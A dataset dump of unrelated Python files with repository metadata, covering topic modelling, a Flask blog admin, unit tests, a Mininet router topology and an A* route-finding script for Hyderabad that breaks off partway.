self.lda = models.ldamodel.LdaModel(corpus=mm_corpus, id2word=dict_lda, num_topics=num_topics, update_every=1, chunksize=chunk_size, passes=1)
#topics = lda.print_topics(self.number_of_topics)
# get list of lda topic names
print(self.FORMAT_LINE)
# printing each topic
for topic in self.lda.print_topics(self.number_of_topics):
print(topic)
print(self.FORMAT_LINE)
print("\n")
print("- Begin naming topics -")
# naming each topic
i = 1
for topic in self.lda.print_topics(self.number_of_topics):
print("\t(" + str(i) + ") "+ topic)
self.topic_names.append(input("> A name for topic (" + str(i) + "): "))
i += 1
print("Done creating LDA topic model")
def predict_topic(self, document):
"""
Predict the most likely topic for the given document
:param document: the string to predict the topic for
:return: the string topic name
"""
if self.lda is None:
print("ERROR in lda_topic_model.predict_topic(): Need to create_lda() before predicting topics.")
dict_lda = getattr(self.lda, 'id2word')
lda_vector = self.lda[dict_lda.doc2bow(self.to_bow(document))]
return self.topic_names[max(lda_vector, key=lambda item: item[1])[0]]
#print(max(lda_vector, key=lambda item: item[1])[0])
#print(lda.print_topic(max(lda_vector, key=lambda item: item[1])[0])) # prints the most prominent LDA topic
@staticmethod
def clean_string(sentence):
"""
Clean the string by removing all punctuation and HTML
http://stackoverflow.com/questions/753052/strip-html-from-strings-in-python
:param sentence: the string potentially containing HTML and other non-alphanumerics
:return: the string cleaned of all tags, undesirables as a list of strings (bag of words)
"""
# TODO: Should removed characters be replaced with a space? Or no space (as is)?
removed_char = ''
s = MLStripper()
s.feed(sentence)
no_html = s.get_data()
# This code apparently removes all text in a string without any HTML
if len(no_html) < 10:
no_html = sentence
# Remove "'s" possession contractions
cleaned = no_html.replace("'s", removed_char)
cleaned = re.sub(r'[^a-zA-Z\' ]+', removed_char, cleaned) # Leaving in letters and apostrophes
# Handling URLs by splitting the 'http' off from the rest of the URL ('httplightsidelabscomwhatresearch')
cleaned = cleaned.replace("http", "http ")
return cleaned.lower()
@staticmethod
def to_bow(sentence):
"""
Turn given string into a bag of words
:param sentence: the string to turn into a list
:return: the string as a list of strings (bag of words)
"""
texts = [word for word in sentence.split()] # turning each word into an item in a list
return texts
class MLStripper(HTMLParser):
"""
A class for stripping HTML tags from a string
"""
def __init__(self):
super().__init__()
self.reset()
self.strict = False
self.convert_charrefs= True
self.fed = []
def handle_data(self, d):
self.fed.append(d)
def get_data(self):
return ''.join(self.fed)
| [
"ihowley@gmail.com"
] | ihowley@gmail.com |
0aa7fe20a08fff787e23337e2dadcb9e8ce74529 | ac36de7b156d726de4900784df5766b7e5582ccb | /bin/housekeeping.py | 8acae01ca3aa199739bcf05897ab37866ba924d7 | [
"Apache-2.0"
] | permissive | gunny26/datalogger4 | 4c92b4305432317aa94680a99e0a2db65de87181 | ab1b6bd295e41f57530a9f1c0977f5dcd1eabf2a | refs/heads/master | 2022-04-16T13:06:35.265474 | 2020-04-14T20:45:33 | 2020-04-14T20:45:33 | 255,380,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,656 | py | #!/usr/bin/python3
import sys
import os
import datetime
import shutil
import logging
import argparse
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s : %(message)s")
def main(archive_dir, data_dir, back):
def inner(directory, oldest):
for filename in sorted(os.listdir(directory)):
if len(filename) != 10 or len(filename.split("-")) != 3:
logging.error("skipping non datestring directory %s", filename)
continue
if filename < oldest:
absfilename = os.path.join(directory, filename)
if os.path.isdir(absfilename):
assert absfilename != directory
if not args.force:
logging.info("would delete subdirectory %s, use -f to do it", absfilename)
else:
logging.info("deleting subdirectory %s", absfilename)
shutil.rmtree(absfilename)
now = datetime.date.today()
oldest = now - datetime.timedelta(days=back)
oldest = oldest.isoformat()
logging.info("deleting analyzed data older than %s", oldest)
inner(data_dir, oldest)
oldest = now - datetime.timedelta(days=back * 2)
oldest = oldest.isoformat()
logging.info("deleting archived raw input data older than %s", oldest)
inner(archive_dir, oldest)
if __name__ == "__main__":
archive_dir = "/srv/raw-archiv/datalogger_raw_archiv/"
data_dir = "/srv/data"
parser = argparse.ArgumentParser(description='deleting old data')
parser.add_argument('--archive-dir', default=archive_dir, help="basedirectory of archived raw_data: %(default)s")
parser.add_argument('--data-dir', default=data_dir, help="basedirectory of archived raw_data: %(default)s")
parser.add_argument("-b", '--back', default=400, type=int, help="online data older than --back days will be purged, and archived raw data older than 2 * this value")
parser.add_argument("-f", '--force', action='store_true', help="force the deletion, otherwise only show what will be done")
parser.add_argument("-q", '--quiet', action='store_true', help="set to loglevel ERROR")
parser.add_argument("-v", '--verbose', action='store_true', help="set to loglevel DEBUG")
args = parser.parse_args()
if args.quiet is True:
logging.getLogger("").setLevel(logging.ERROR)
if args.verbose is True:
logging.getLogger("").setLevel(logging.DEBUG)
logging.debug(args)
if not args.force:
logging.error("-f is not set, so only displaying what would be done")
main(args.archive_dir, args.data_dir, args.back)
| [
"arthur.messner@tirol-kliniken.at"
] | arthur.messner@tirol-kliniken.at |
b5612e469ab15c7cfa726e1f6d7ef51c8a9253ec | fe4073028c22079c9908bba9d1f558256b3d3a73 | /app.py | d3eb02e6315a5462f6f5a86462442f07596f4069 | [] | no_license | romanannaev/BlogFlaskFinish | fb35c8fbe3a77753f0664641215cc44f4617b98f | 3aaecab0b1c3694aa584229963d7c521a301c33e | refs/heads/master | 2021-10-22T08:45:07.250060 | 2020-01-08T14:29:54 | 2020-01-08T14:29:54 | 231,746,001 | 0 | 0 | null | 2021-03-20T02:37:58 | 2020-01-04T10:37:40 | Python | UTF-8 | Python | false | false | 2,169 | py | import os
from flask import Flask, request
from flask_sqlalchemy import SQLAlchemy
#create admin
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
#flask security, the storage of users, roles
from flask_security import SQLAlchemyUserDatastore
from flask_security import Security
app = Flask(__name__)
app.config.from_object(os.environ['APP_SETTINGS'])
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
import view
from posts.blueprint import posts
app.register_blueprint(posts, url_prefix='/blog') #registration posts app(blueprint)
### Admin ####
from models import *
#integration Admin and Flask Security
from flask_security import current_user
from flask import redirect, url_for, request
class AdminMixin:
def is_accessible(self):
return current_user.has_role('admin')
def inaccessible_callback(self, name, **kwargs):
#localhost/admin/
return redirect(url_for('security.login', next=request.url))
#Point to admin panel to use our class-constructors
#Allows our to change slug at the moment creating or editing Post from admin Panel
class BaseModelView(ModelView):
def on_model_change(self, form, model , is_created):
model.generate_slug()
return super(BaseModelView, self).on_model_change(form, model, is_created)
#class constrains allow to models POst and Tag in AdminPanel
class AdminView(AdminMixin, ModelView):
pass
#class constrains allow to AdminPanel at all
from flask_admin import AdminIndexView
class HomeAdminView(AdminMixin, AdminIndexView):
pass
class PostAdminView(AdminMixin, BaseModelView):
form_columns = ['title', 'body', 'tags', 'image']
class TagAdminView(AdminMixin, BaseModelView):
form_columns = ['name', 'posts']
admin = Admin(app, 'FlaskApp', url='/', index_view=HomeAdminView(name='Home'))
admin.add_view(PostAdminView(Post, db.session)) #before was ModelView instead of AdminView --->PostAdminView
admin.add_view(TagAdminView(Tag, db.session))
## flask security ##
user_datastore = SQLAlchemyUserDatastore(db, User, Role)
security = Security(app, user_datastore)
if __name__ == '__main__':
app.run() | [
"romanannaev1992@gmail.com"
] | romanannaev1992@gmail.com |
d15f20cb57d710606567750e55850e68d835261d | c4a8cb8e7a34b088c5780b5abaa2bf33172a8c67 | /email_pdf.py | ca930831f9a91218ae8e8f8699edf19aaa1ca4b5 | [] | no_license | jeffwheeler/scan2present | ff94e49fccd1850c828f6e7bc1944db4016d0180 | 0bdc8ae7137b07480f235016cf04a913c1290f96 | refs/heads/master | 2020-06-05T07:07:49.140155 | 2014-03-15T09:31:55 | 2014-03-15T09:31:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | import smtplib
from email.MIMEBase import MIMEBase
from email.MIMEMultipart import MIMEMultipart
from email import Encoders
SERVER_EMAIL = 'jeffwheeler@stanford.edu'
def send_pdf(to_addr):
message = MIMEMultipart()
message['Subject'] = 'Your PDF'
message['From'] = SERVER_EMAIL
message['To'] = to_addr
pdf = MIMEBase('application', 'pdf')
fp = open('./tikz_gen/slides.pdf', 'rb')
pdf.set_payload(fp.read())
fp.close()
Encoders.encode_base64(pdf)
pdf.add_header('Content-Disposition', 'attachment', filename='slides.pdf')
message.attach(pdf)
s = smtplib.SMTP('localhost')
s.sendmail(SERVER_EMAIL, to_addr, message.as_string())
s.quit()
if __name__ == '__main__':
send_pdf()
| [
"jeffwheeler@gmail.com"
] | jeffwheeler@gmail.com |
c09b49731c933af584b62a2ca38a073aaa19b713 | 92028014dd9d3cc4a24e933147bdfe70ebb51cae | /tests/test_hand.py | 9d75bbc9f146996a325b7e95a9b792d5054535c3 | [] | no_license | nualagr/poker | b0d87a5e17057303b358eee87da43fdae8fd12bf | 75ed648a2f77e7ebda245d240ba5d1a02a140462 | refs/heads/master | 2023-08-22T04:42:01.842610 | 2021-09-29T14:30:47 | 2021-09-29T14:30:47 | 398,568,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,516 | py | import unittest
from poker.card import Card
from poker.hand import Hand
from poker.validators import PairValidator
class HandTest(unittest.TestCase):
def test_starts_out_with_no_cards(self):
hand = Hand()
self.assertEqual(hand.cards, [])
def test_shows_all_its_cards_in_technical_representation(self):
cards = [Card(rank="Ace", suit="Clubs"), Card(rank="3", suit="Spades")]
hand = Hand()
hand.add_cards(cards)
self.assertEqual(repr(hand), "3 of Spades, Ace of Clubs")
def test_receives_and_stores_cards(self):
ace_of_spades = Card(rank="Ace", suit="Spades")
six_of_clubs = Card(rank="6", suit="Clubs")
cards = [ace_of_spades, six_of_clubs]
hand = Hand()
hand.add_cards(cards)
self.assertEqual(hand.cards, [six_of_clubs, ace_of_spades])
def test_interacts_with_validator_to_get_winning_hand(self):
class HandWithOneValidator(Hand):
# Override the SuperClass VALIDATORS attribute
# to be a tuple of one. This is enough to test the
# 'best_rank' method.
VALIDATORS = (PairValidator,)
ace_of_hearts = Card(rank="Ace", suit="Hearts")
ace_of_spades = Card(rank="Ace", suit="Spades")
cards = [
ace_of_hearts,
ace_of_spades,
]
hand = HandWithOneValidator()
hand.add_cards(cards=cards)
self.assertEqual(hand.best_rank(), (0, "Pair", [ace_of_hearts, ace_of_spades]))
| [
"nualagreenwood@gmail.com"
] | nualagreenwood@gmail.com |
b2181662bb9fd4692be62048034418cbbcd3c91a | 63be7bc696aa5ac51d55b35854dfaf2eac3470c6 | /tests/test_backup_list.py | 3a9b63aa77bec543b01cd3c3245af54aa6b4d0cd | [
"MIT"
] | permissive | sabidib/pytest-redis | 6c10c40b0389dabbcfed49d15df70beeca873def | 26f5aa1e4590dee942bac44eea7ea3f8ff544f67 | refs/heads/master | 2021-01-21T14:44:19.433845 | 2016-05-26T13:45:50 | 2016-05-26T13:45:50 | 58,546,090 | 0 | 1 | null | 2016-05-26T13:45:50 | 2016-05-11T13:13:12 | Python | UTF-8 | Python | false | false | 2,296 | py | """Tests the pytest-redis backup list arguments."""
import utils
def create_test_file(testdir):
"""Create test file and return array of paths to tests."""
test_filename = "test_file.py"
test_filename_contents = """
def test_exists():
assert True
def test_does_exist():
assert True
"""
utils.create_test_file(testdir, test_filename, test_filename_contents)
return [test_filename + "::test_exists", test_filename +
"::test_does_exist"]
def get_args_for_backup_list(redis_args, backup_list_key):
"""Return args for the backup list tests."""
return utils.get_standard_args(redis_args) + ["-s",
"--redis-backup-list-key=" +
backup_list_key]
def test_run_back_up_test(testdir, redis_connection,
redis_args):
"""Ensure that the backup list is filled with tests."""
file_paths_to_test = create_test_file(testdir)
back_up_list = redis_args["redis-backup-list-key"]
py_test_args = get_args_for_backup_list(redis_args, back_up_list)
for a_file in file_paths_to_test:
redis_connection.lpush(back_up_list,
a_file)
testdir.runpytest(*py_test_args)
assert redis_connection.llen(back_up_list) == 2
for a_file in file_paths_to_test:
assert redis_connection.rpop(back_up_list) == a_file
def test_run_tests_multiple_times_with_backup(testdir, redis_connection,
redis_args):
"""Run a test multiple times to ensure backup list is used."""
file_paths_to_test = create_test_file(testdir)
back_up_list = redis_args["redis-backup-list-key"]
py_test_args = get_args_for_backup_list(redis_args, back_up_list)
for a_file in file_paths_to_test:
redis_connection.lpush(redis_args['redis-list-key'],
a_file)
for i in range(10):
result = testdir.runpytest(*py_test_args)
result.stdout.fnmatch_lines([i + " PASSED" for i in file_paths_to_test])
assert redis_connection.llen(back_up_list) == 2
for a_file in file_paths_to_test:
assert redis_connection.rpop(back_up_list) == a_file
| [
"samy.abidib@shopify.com"
] | samy.abidib@shopify.com |
e34ddccd94638c82612a301dcb783977751ee558 | 685038d4be188fa72e9dba1d2213a47ee3aa00a2 | /ECOS2021/Demands/Inputs/Surveys/A/S4/Jul_S4_A.py | 39db06fef88624a9f7eead973c903d14f3b922fc | [] | no_license | CIE-UMSS/Tradeoff-between-Installed-Capacity-and-Unserved-Energy | e5599e4e4ac60b97f0c4c57c5de95e493b1b5ac4 | 459f31552e3ab57a2e52167ab82f8f48558e173c | refs/heads/master | 2023-06-01T18:09:29.839747 | 2021-06-19T15:56:26 | 2021-06-19T15:56:26 | 343,720,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,963 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 31 14:33:07 2020
@author: alejandrosoto
Script for 2 class of household in Raqaypampa.
"""
# -*- coding: utf-8 -*-
"""
@author: Alejandro Soto
"""
from core import User, np
User_list = []
#User classes definition
HI = User("high income",1)
User_list.append(HI)
LI = User("low income",0)
User_list.append(LI)
'''
Base scenario (BSA): Indoor bulb (3), outdoor bulb (1), radio (1), tv (1), phone charger (2), Water Heater (1), Mixer (1)
Base scenario (B): Indoor bulb (3), outdoor bulb (1), radio (1), tv (1), phone charger (2)
A
Scenario 1: BSA + Fridge (1) + Freezer* (1).
Scenario 2: BSA + Fridge (1).
Scenario 3: BSA + Fridge (1)*.
Scenario 4: BSA + Freezer (1).
Scenario 5: BSA + Wheler (1).
Scerario 6: BSA + Grinder (1).
Scanerio 7: Add + Dryer (1),
Scenario 9: All
B
Scenario 8: BSB + Water Heater** (1).
Scenario 10: BSA + Pump Water (1).
Scenario 11: BSA + DVD (1).
Scenario 12: BSA + Blender (1).
Scenario 13: BSA + Iron (1).
Scerario 14: BSA + Mill (1).
* With seasonal variation
** Occasional use
Cold Months: May-Aug Std Cycle 8:00-18:00 Above 10 degrees
Warm Months: Jan-Apr Std Cycle 0:00-23:59 Above 10 degrees
Hot Nonths: Sep-Dec Std Cycle 0:00-10:00; 15:01-23:59 Above 10 degrees
Int Cycle 10:01-15:00
'''
#High-Income
#indoor bulb
HI_indoor_bulb = HI.Appliance(HI,3,7,1,320,0.6,190)
HI_indoor_bulb.windows([1080,1440],[0,0])
#outdoor bulb
HI_outdoor_bulb = HI.Appliance(HI,1,13,1,340,0.1,300)
HI_outdoor_bulb.windows([1100,1440],[0,0])
HI_Radio = HI.Appliance(HI,1,7,1,280,0.3,110)
HI_Radio.windows([420,708],[0,0])
#tv
HI_TV = HI.Appliance(HI,1,60,3,300,0.38,114)
HI_TV.windows([1140,1440],[651,1139],0.35,[300,650])
#phone charger
HI_Phone_charger = HI.Appliance(HI,2,5,3,250,0.4,95)
HI_Phone_charger.windows([1190,1440],[0,420],0.35,[421,1189])
#water_heater
HI_Water_heater = HI.Appliance(HI,1,150,1,60,0.05,30)
HI_Water_heater.windows([0,1440],[0,0])
#mixer
HI_Mixer = HI.Appliance(HI,1,50,1,10,0.5,5,occasional_use = 0.3)
HI_Mixer.windows([420,560],[0,0])
#freezer
HI_Freezer = HI.Appliance(HI,1,200,1,1440,0,30,'yes',3)
HI_Freezer.windows([0,1440],[0,0])
HI_Freezer.specific_cycle_1(200,20,5,10)
HI_Freezer.specific_cycle_2(200,15,5,15)
HI_Freezer.specific_cycle_3(200,10,5,20)
HI_Freezer.cycle_behaviour([600,900],[0,0],[0,0],[0,0],[0,599],[901,1440])
#Lower Income
#indoor bulb
LI_indoor_bulb = LI.Appliance(LI,3,7,2,287,0.4,124)
LI_indoor_bulb.windows([1153,1440],[0,300],0.5)
#outdoor bulb
LI_outdoor_bulb = LI.Appliance(LI,1,13,1,243,0.3,71)
LI_outdoor_bulb.windows([1197,1440],[0,0])
#radio
LI_Radio = LI.Appliance(LI,1,7,2,160,0.3,49)
LI_Radio.windows([480,840],[841,1200],0.5)
#TV
LI_TV = LI.Appliance(LI,1,100,3,250,0.3,74)
LI_TV.windows([1170,1420],[551,1169],0.3,[300,550])
#phone charger
LI_Phone_charger = LI.Appliance(LI,2,5,3,200,0.4,82)
LI_Phone_charger.windows([1020,1440],[0,420],0.3,[720,1019])
| [
"asm19971997@gmail.com"
] | asm19971997@gmail.com |
e25e5edb0703725283c9e674fc6085ad431c3b52 | ed4587c16e0708f0b618d8703b0ea9e86f5c3237 | /Layers/HiddenLayer.py | c0b7f6809f033afd968f23563e71d82e0f8955df | [] | no_license | CaoDuyThanh/NN_Autoencoder | b85256e4c4a1a71072c876c45098606244966cf8 | 0a0fc8e23e39249c6562249cf538e3b5898037f5 | refs/heads/master | 2021-01-23T22:15:06.380045 | 2017-02-26T13:33:50 | 2017-02-26T13:33:50 | 83,121,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,858 | py | import theano
import numpy
import cPickle
import theano.tensor as T
from theano.tensor.shared_randomstreams import RandomStreams
class HiddenLayer:
def __init__(self,
rng, # Random seed
input, # Data input
numIn, # Number neurons of input
numOut, # Number reurons out of layer
activation = T.tanh, # Activation function
W = None,
b = None,
corruption = None
):
# Set parameters
self.Rng = rng;
self.Input = input
self.NumIn = numIn
self.NumOut = numOut
self.Activation = activation
self.Corruption = corruption
# Create shared parameters for hidden layer
if W is None:
""" We create random weights (uniform distribution) """
# Create boundary for uniform generation
wBound = numpy.sqrt(6.0 / (self.NumIn + self.NumOut))
self.W = theano.shared(
numpy.asarray(
rng.uniform(
low=-wBound,
high=wBound,
size=(self.NumIn, self.NumOut)
),
dtype=theano.config.floatX
),
borrow=True
)
else:
""" Or simply set weights from parameter """
self.W = W
if b is None:
""" We create zeros bias """
# Create bias
self.b = theano.shared(
numpy.zeros(
shape = (self.NumOut, ),
dtype=theano.config.floatX
),
borrow=True
)
else:
""" Or simply set bias from parameter """
self.b = b
def getCorruptedInput(self, input, corruptionLevel):
theano_rng = RandomStreams(self.Rng.randint(2 ** 30))
return theano_rng.binomial(size=input.shape, n=1,
p=1 - corruptionLevel,
dtype=theano.config.floatX) * input
def Output(self):
input = self.Input
if self.Corruption is not None:
self.Input = self.getCorruptedInput(self.Input, self.Corruption)
output = T.dot(input, self.W) + self.b
if self.Activation is None:
return output
else:
return self.Activation(output)
'''
Return transpose of weight matrix
'''
def WTranspose(self):
return self.W.T
def Params(self):
return [self.W, self.b]
def LoadModel(self, file):
self.W.set_value(cPickle.load(file), borrow = True)
self.b.set_value(cPickle.load(file), borrow = True) | [
"caoduythanhcantho@gmail.com"
] | caoduythanhcantho@gmail.com |
ea5aa679209b5f87452309f4ae5d2b6780c1cbc6 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5634697451274240_0/Python/elsw/revenge_pancakes.py | 5b7acca8e7d41f5d660ecf7e2208da6c469f5d79 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | #/usr/bin/env python
# Google Code Jam Qualification Round 2016
# B. Revenge of the Pancakes
# https://code.google.com/codejam/contest/6254486/dashboard#s=p1
def happy(stack):
s = stack + '+'
t = s[0]
c = 0
for p in s[1:]:
if p != t:
c += 1
t = p
return c
with open('B-small-attempt0.in', 'r') as f:
t = int(f.readline())
with open('test.out', 'w') as g:
for i in xrange(t):
stack = f.readline().strip()
g.write('Case #%d: %d\n' % (i+1, happy(stack)))
| [
"alexandra1.back@gmail.com"
] | alexandra1.back@gmail.com |
fb7a9b2ad58dbbac6198ce33d39b861c5eaa39e5 | 0e09aa91ecfd3dcdfa1faf17a3a76bc5ba53a1a0 | /raterapp/apps.py | 34501b748a4802d536e1fce228bbbe98ff2a10ae | [] | no_license | MatthewSingler/rater-server | 39a25e538962f96688785d53c6828d2a4689d13f | 4c81f035d6951d2b9f2fd55f9005fbb735ea6e4e | refs/heads/main | 2023-09-02T14:19:52.040205 | 2021-11-10T19:37:19 | 2021-11-10T19:37:19 | 423,614,609 | 0 | 0 | null | 2021-11-10T19:37:20 | 2021-11-01T20:59:32 | Python | UTF-8 | Python | false | false | 148 | py | from django.apps import AppConfig
class RaterappConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'raterapp'
| [
"matthew.singler@gmail.com"
] | matthew.singler@gmail.com |
75994678cac4372a1f4b8c6364f38c95135e24d0 | 21644787e5f1101c9e4af52c0879e3625fe58b92 | /productos/migrations/0001_initial.py | d90c43acae9a3bc345982d67b4c5f4530d240d8c | [] | no_license | marta3/PaginaDjango | 1489d689179a89eea1b273ae6aabf855cc590fce | c8567f9204269c685e2eb17fb7506254b24a560a | refs/heads/master | 2022-11-06T03:44:48.503901 | 2018-02-21T11:01:36 | 2018-02-21T11:01:36 | 122,324,465 | 0 | 1 | null | 2022-10-28T13:17:15 | 2018-02-21T10:53:43 | Python | UTF-8 | Python | false | false | 2,226 | py | # Generated by Django 2.0 on 2018-02-14 08:28
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='pedidos',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='Perfiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('usuario', models.CharField(max_length=30)),
('direccion', models.CharField(blank=True, max_length=50)),
('fecha_nacimiento', models.DateField(blank=True, null=True)),
('telefono', models.CharField(max_length=20)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Productos',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=100)),
('descripcion', models.CharField(max_length=150)),
('precio', models.IntegerField()),
('foto', models.ImageField(default='fotos/fotico.png', upload_to='fotos/')),
('categoria', models.CharField(choices=[('Postre', 'Postre'), ('Comidas', 'Comidas'), ('Bebidas', 'Bebidas')], default='Comidas', max_length=10)),
],
),
migrations.AddField(
model_name='pedidos',
name='id_prod',
field=models.ManyToManyField(to='productos.Productos'),
),
migrations.AddField(
model_name='pedidos',
name='nom_usu',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"martaab1997@gmail.com"
] | martaab1997@gmail.com |
9c53ab1aae60600743db9747d0c63fc33815b1d3 | 32809f6f425bf5665fc19de2bc929bacc3eeb469 | /src/0435-Non-overlapping-Intervals/0435.py | 7ead2f6d87451d06255ac7a691c7621aab8a49fb | [] | no_license | luliyucoordinate/Leetcode | 9f6bf01f79aa680e2dff11e73e4d10993467f113 | bcc04d49969654cb44f79218a7ef2fd5c1e5449a | refs/heads/master | 2023-05-25T04:58:45.046772 | 2023-05-24T11:57:20 | 2023-05-24T11:57:20 | 132,753,892 | 1,575 | 569 | null | 2023-05-24T11:57:22 | 2018-05-09T12:30:59 | C++ | UTF-8 | Python | false | false | 533 | py | class Solution:
def eraseOverlapIntervals(self, intervals: List[List[int]]) -> int:
intervals.sort(key=lambda x: x[0])
result, pre = 0, None
for cur in intervals:
if prev and prev[1] > cur[0]:
result += 1
if cur[1] < prev[1]:
prev = cur
else:
prev = cur
return result
if __name__ == "__main__":
intervals = [[1,2], [2,3], [3,4], [1,3]]
print(Solution().eraseOverlapIntervals(intervals)) | [
"luliyucoordinate@outlook.com"
] | luliyucoordinate@outlook.com |
4a1a2aa093ea9f5082e68fb215190fec44f67e96 | b88ddf1bbc0e203b403584428078d73593715454 | /builder/igloo_director.py | ea3e87cb018003a80ebf063c557b4af64e4ccf29 | [] | no_license | keys4words/designPatterns | ef28289a92d68652f3d34a9a609aebe986e785bb | 0d6ebd5dc1f8c3be725f7405bb785436eec37a89 | refs/heads/main | 2023-04-15T01:15:27.231107 | 2021-04-20T13:31:25 | 2021-04-20T13:31:25 | 348,728,039 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py | from house_builder import HouseBuilder
class IglooDirector:
"One of the Directors, that can build a complex representation."
@staticmethod
def construct():
return HouseBuilder().set_building_type("Igloo").set_wall_material("Ice").set_number_doors(1).get_result() | [
"keys4words@gmail.com"
] | keys4words@gmail.com |
924e843bf762ca9d9e88f6d17f4e35920d84013f | 4bb6a8cbd7ac887ec4abc6abc97f0cb17415e82d | /Chapter 5 Strings/numbers2text.py | 7d27d3705f77296072ca8408e9a44d5c200e6e9c | [] | no_license | jbhennes/CSCI-220-Programming-1 | cdc9cab47b4a79dccabf014224a175674e9a7155 | ac9e85582eeb51a205981674ffdebe8a5b93a205 | refs/heads/master | 2021-01-01T03:54:50.723923 | 2016-05-02T16:06:55 | 2016-05-02T16:06:55 | 57,902,553 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | # numbers2text.py
# A program to convert a sequence of ASCII numbers into
# a string of text.
import string # include string library for the split function.
def main():
print "This program converts a sequence of ASCII numbers into"
print "the string of text that it represents."
print
# Get the message to encode
inString = raw_input("Please enter the ASCII-encoded message: ")
# Loop through each substring and build ASCII message
message = ""
for numStr in string.split(inString):
asciiNum = eval(numStr) # convert digits to a number
message = message + chr(asciiNum) # append character to message
print "The decoded message is:", message
main()
| [
"jbhennes@g.cofc.edu"
] | jbhennes@g.cofc.edu |
c7e010d1c4eff67c8129a08d22beac7d0f912f78 | 8ed876f84db919231bfeff0632958668d9ab8f65 | /P4_Subnet/im_legacy_router.py | 805e26d9b59866a8897ed4e6f842823ae388c975 | [] | no_license | nayelimdejesus/CST311 | 6268763ce28bf901ef9425e71dce672d0c8d2cda | d4306714d62a4d4738f56572e3a575ce15c0f792 | refs/heads/master | 2022-11-23T13:12:33.843475 | 2020-08-02T04:06:36 | 2020-08-02T04:06:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,839 | py | #!/usr/bin/python
from mininet.net import Mininet
from mininet.node import Host, Node
from mininet.cli import CLI
from mininet.log import setLogLevel, info
from mininet.topo import Topo
def myNetwork():
# topology constructor
# initializes empty topology with no build or ip address
net = Mininet( topo=None, build=False, ipBase='0.0.0.0')
info( '*** Adding controller\n' )
info( '*** Add switches\n')
# Creates router for host 1 and host 2 to connect; sets its IP address
# cls=Node inherets all node class members, and public attributes
# CIDR to IP Range of 192.168.1.1 - 192.168.1.255 (256 possible hosts)
r1 = net.addHost('r1', cls=Node, ip='192.168.1.1/24')
# Sends a command from r1 (host / router), waits for its ouput, and then returns it
r1.cmd('sysctl -w net.ipv4.ip_forward=1')
info( '*** Add hosts\n')
# Creates host 1 and 2 and sets their IP adresses and the route to access them
h1 = net.addHost('h1', ip='192.168.1.100/24', defaultRoute='via 192.168.1.1')
h2 = net.addHost('h2', ip='192.168.2.100/24', defaultRoute='via 192.168.2.1')
info( '*** Add links\n')
# Creates a link between r1(router) to host h1
net.addLink(h1, r1, intfName2='r0-eth1', params2={ 'ip' : '192.168.1.1/24' } )
# Creates a link between r1(router) to host h2
net.addLink(h2, r1, intfName2='r0-eth2', params2={ 'ip' : '192.168.2.1/24' } )
info( '*** Starting network\n')
# Runs the topology and starts the network
net.build()
# List of commands
CLI(net)
# Stops running topology
net.stop()
# sets verbosity level for log message
if __name__ == '__main__':
setLogLevel( 'info' )
myNetwork() | [
"ric3639@gmail.com"
] | ric3639@gmail.com |
2d27cfa1235bef09f4adf5a230773fdd5de73250 | 0ba8030da93038bf799e94178e417721ec0a2c77 | /A_star-Algorithm.py | cf37e192d7aa26b10c68a51802825f9c9416335f | [] | no_license | stgstg27/Optimal-Path-in-Hyderabad | a09bb1bd3e78c28961d67e03dfbe4b4a7c1c8f4c | 48681a07626610b3dd026b95c3f1d87531e43d3b | refs/heads/master | 2021-04-07T02:24:44.338940 | 2018-03-15T00:40:25 | 2018-03-15T00:40:25 | 125,290,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,432 | py | ####################################################################
##### Finding path using A* Algorithm and Graph ############
##### Artificial Intelligence (CS F407) ############
##### @author: Saurabh,Akhil ############
####################################################################
import pickle
from heapq import heappush,heappop
from geopy.distance import vincenty
import pandas as pd
import gmplot
import numpy as np
import requests
import json
import re
print('Importing Libraries.............')
print ('Loading Adjancency Matrix......')
with open('adj_mat.pkl','rb') as fp:
a=pickle.load(fp)
df = pd.read_csv('cordinates.csv') #Reading LATITUDE AND LONGITUDE DATASET CSV File()
open1=[]# Priority Queue ::Queue of pair of Nodeid and their correspoding score accoring to A* Algorithm
open2=[]
closed=[]# List of pair of Nodeid and their correspoding score accoring to A* Algorithm
#f = g+h
''''
Starting Destination :
start_dest
'''
start_dest=6
''''
Ending Destination :
end_dest
'''
end_dest=1
len_listofplaces=len(a)
def compdis(loc1,loc2):
'''
Function to calculate the HEURISTIC DISTANCE between loc1,loc2
Parameters:-
loc1(int): Node_id of 1st Location
loc2(int): Node_id of 1st Location
Returns
